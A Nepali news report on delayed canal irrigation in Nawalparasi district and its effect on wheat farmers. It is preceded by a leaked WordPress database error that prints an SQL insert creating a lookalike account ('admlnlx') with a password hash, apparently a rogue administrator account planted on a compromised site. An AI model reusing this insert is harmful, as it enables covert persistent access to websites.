WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiIzXfJS3ZeFgXdoO1DizxC9tFPnpR.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 04:09:15', '', 'admlnlx', 'admlnlx')
मोहम्मद ईजहार शेष,
परासी, पुस ६–
यो वर्ष पनि ढिला गरि नवलपरासीमा रहेका नहरहरुमा पानी खोलिएको छ । नेपाल पश्चिम गण्डक सिंचाई नहर प्रणाली त्रिबेणी कमाण्ड अन्तर्गत पर्ने नवलपरासीको विभिन्न नहर, साखा नहर, माईनर नहर, मुल कुलो लगायतमा सिँचाई गर्न सुरु भएको १ महिना पछि पानी खोलीएको हो । नवलपरासी जिल्लाको १९ वटा गाविसहरु नहर कमाण्ड अन्तर्गतको सिंचित क्षेत्र अन्तर्गत पर्दछ भने जिल्लामा ३ वटा साखा, ७ वटा माईनर मुलो कुलो २६ वटा र सहायक कुलो १ सय ६२ वटा रहेका छन् ।
नवलपरासीको त्रिवेणी देखि सनई गाविस सम्म फैलिएको उक्त नहरमा अहिले पानी खोलीए पनि करिब ७५ प्रतिशत किसानहरु गहुँमा सिँचाई गरि सकेका छन् । ४ बिगहामा गहुँ खेती गरेका बडहरा दुबौलिया वडा नम्बर १ बडसारका ब्यवसायिक कृषक बदरुल हक खानले आफनो सबै खेती सिँचित क्षेत्र अन्तर्गत रहेपनि नहरको पानी समयमा नआउँदा जहिले पनि बोरिङ्गले सिँचाई गर्ने गरेको बताउनु भयो । तर नेपाल पश्चिम गण्डक सिंचाई नहर प्रणाली नवलपरासीका अध्यक्ष हैदर अलि मोमिनले भारतीय पक्षले समयमा भारतीय नहरको पानी मेन्टेन नगरेकाले नहरमा पानी खोल्न ढिलाई भएको बताउनु भयो ।
नहर नेपालमा रहेपनि नहरको कुनैपनि कार्यमा भारतको बस चल्ने भएकाले नेपाली नहर १ महिना अघिनै सरसफाई गरि तयारी गरिएपनि ढिलाई गरि पानी खोलीएको उहाँले बताउनु भयो । सो नहरहरुमा धान रोपाईको बेलापनि पानी ढिला गरिनै खोल्ने गरिएको किसानहरुको गुनासो गरेका छन् । जिल्लाको कुल क्षेत्रफलको ८ हजार ७ सय हेक्टर क्षेत्रफल नहर कमाण्डको सिँचित क्षेत्र अन्तर्गत पर्दछ ।